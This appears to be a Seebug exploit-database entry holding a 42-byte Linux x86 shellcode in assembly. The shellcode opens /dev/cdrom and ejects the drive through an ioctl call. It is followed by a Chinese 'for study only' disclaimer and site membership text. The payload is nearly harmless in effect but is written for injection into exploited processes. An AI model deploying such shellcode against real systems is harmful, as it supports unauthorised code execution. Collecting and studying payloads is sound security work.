; linux/x86 eject /dev/cdrom 42 bytes ; root@thegibson ; 2010-01-08 section .text global _start _start: ; open("/dev/cdrom", O_RDONLY | O_NONBLOCK); mov al, 5 cdq push edx push word 0x6d6f push dword 0x7264632f push dword 0x7665642f mov ebx, esp mov cx, 0xfff sub cx, 0x7ff int 0x80 ; ioctl(fd, CDROMEJECT, 0); mov ebx, eax mov al, 54 mov cx, 0x5309 cdq int 0x80
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论